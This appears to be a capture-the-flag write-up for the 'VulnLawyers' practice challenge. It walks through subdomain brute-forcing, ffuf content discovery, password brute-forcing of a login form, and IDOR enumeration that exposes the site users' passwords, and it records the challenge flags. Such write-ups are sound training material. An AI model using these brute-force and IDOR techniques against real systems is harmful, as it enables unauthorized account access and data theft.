Vulnlawyers

DNS Recon

 nslookup -type=any vulnlawyers.co.uk 8.8.8.8
Server:		8.8.8.8
Address:	8.8.8.8#53

Non-authoritative answer:
Name:	vulnlawyers.co.uk
Address: 68.183.255.206
vulnlawyers.co.uk	nameserver = ns1.digitalocean.com.
vulnlawyers.co.uk	nameserver = ns2.digitalocean.com.
vulnlawyers.co.uk	nameserver = ns3.digitalocean.com.
vulnlawyers.co.uk
	origin = ns1.digitalocean.com
	mail addr = hostmaster.vulnlawyers.co.uk
	serial = 1626211986
	refresh = 10800
	retry = 3600
	expire = 604800
	minimum = 1800

Authoritative answers can be found from:

 dnsrecon -d vulnlawyers.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnlawyers.co.uk
[*] 	 A data.vulnlawyers.co.uk 68.183.255.206
[*] 	 A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found

Visit: http://data.vulnlawyers.co.uk to get the first flag {"name":"VulnLawyers Website API","version":"2.1.04","flag":"[^FLAG^E78DEBBFDFBEAFF1336B599B0724A530^FLAG^]"}

Content Discovery

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://www.vulnlawyers.co.uk/FUZZ
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.20 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

css                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
denied                  [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 30ms]
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 31ms]
js                      [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
login                   [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 38ms]

When visiting http://vulnlawyers.co.uk/login we instantly get redirected to http://vulnlawyers.co.uk/denied which tells us that we can't access that portal with our url Let's use curl to check if we can find some data due to an broken redirect

 curl -H "Cookie: ctfchallenge=CENSORED" http://vulnlawyers.co.uk/login
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>VulnLawyers - Old Login</title>
    <link href="/css/bootstrap.min.css" rel="stylesheet">
    <link href="/template-manager/style.css" rel="stylesheet">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-md-12">
            <h1 style="padding-top:100px;text-align: center;color: #060505;letter-spacing: -1px;font-weight: bold">VulnLawyers</h1>
            <h3 class="text-center">We'll win that case!</h3>
        </div>
    </div>
    <div class="row">
        <div class="col-md-6 col-md-offset-3">
            <div class="alert alert-info">
                <p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
                <p>[^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]</p>
            </div>
        </div>
    </div>
</div>
<script src="/js/jquery.min.js"></script>
<script src="/js/bootstrap.min.js"></script>
</body>
</html>

API Discovery

Back in the DNS Recon Phase we found http://data.vulnlawyers.co.uk to get the first flag. It mentioned an API. Lets check if we can find any useful endpoints

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://data.vulnlawyers.co.uk/FUZZ
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.20 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

campaigns               [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 27ms]
users                   [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 29ms]
web.config              [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 26ms]

 curl -H "Cookie: ctfchallenge=CENSORED" http://data.vulnlawyers.co.uk/users | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   406    0   406    0     0   6766      0 --:--:-- --:--:-- --:--:--  6766
{
  "users": [
    {
      "name": "Yusef Mcclain",
      "email": "yusef.mcclain@vulnlawyers.co.uk"
    },
    {
      "name": "Shayne Cairns",
      "email": "shayne.cairns@vulnlawyers.co.uk"
    },
    {
      "name": "Eisa Evans",
      "email": "eisa.evans@vulnlawyers.co.uk"
    },
    {
      "name": "Jaskaran Lowe",
      "email": "jaskaran.lowe@vulnlawyers.co.uk"
    },
    {
      "name": "Marsha Blankenship",
      "email": "marsha.blankenship@vulnlawyers.co.uk"
    }
  ],
  "flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
}

Bruteforcing

We've discovered the login page previously during our content discovery phase. Let's check if we can crack a password by using the infos we've gathered on the api

Let's check the login panel source

<div class="panel-body">
    <form method="post">
        <div><label>User Email:</label></div>
        <div style="margin-top: 7px"><input class="form-control" name="email" ></div>
        <div style="margin-top: 7px"><label>Password:</label></div>
        <div><input class="form-control" type="password" name="password" ></div>
        <div style="margin-top:7px">
        <input type="submit" class="btn btn-success pull-right" value="Login"></div>

using ffuf we will bruteforce the password

❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 200
        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://www.vulnlawyers.co.uk/lawyers-only-login
 :: Wordlist         : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/passwords.txt
 :: Header           : Cookie: ctfchallenge=CENSORED
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 1
 :: Delay            : 0.10 seconds
 :: Matcher          : Response status: all
 :: Filter           : Response status: 200
________________________________________________

123456                  [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 33ms]
password                [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 32ms]
summer                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
:: Progress: [101/101] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

After we logged in as jaskaran.lowe@vulnlawyers.co.uk using the password summer we can find another flag [^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]

IDOR

While browsing the webportal we find and "Profile" Tab under http://www.vulnlawyers.co.uk/lawyers-only-profile which should let us update our own details. I've tried to change the name and recorded the request in my browsers dev console. It didn't work but I got another URL which seems to be an API for Userdata URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/4

{"id":4,"name":"Jaskaran Lowe","email":"jaskaran.lowe@vulnlawyers.co.uk","password":"summer"}

Let's check for IDOR Vulnerabilities URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/1

{"id":1,"name":"Yusef Mcclain","email":"yusef.mcclain@vulnlawyers.co.uk","password":"Rk@c7#U3@2r%0f"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/2 Got another flag

{"id":2,"name":"Shayne Cairns","email":"shayne.cairns@vulnlawyers.co.uk","password":"q2V944&#2a1^3p","flag":"[^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/3

{"id":3,"name":"Eisa Evans","email":"eisa.evans@vulnlawyers.co.uk","password":"Sn06#ibx@lGPG7"}

URL: http://www.vulnlawyers.co.uk/lawyers-only-profile-details/5

{"id":5,"name":"Marsha Blankenship","email":"marsha.blankenship@vulnlawyers.co.uk","password":"A^66vqhOU!e2ZV"}

Final Flag

Logging in as Shayn Cairns we seem to have permissions to delete cases. Let's examine this. After clicking on "delete case" we get the final flag [^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]

Last updated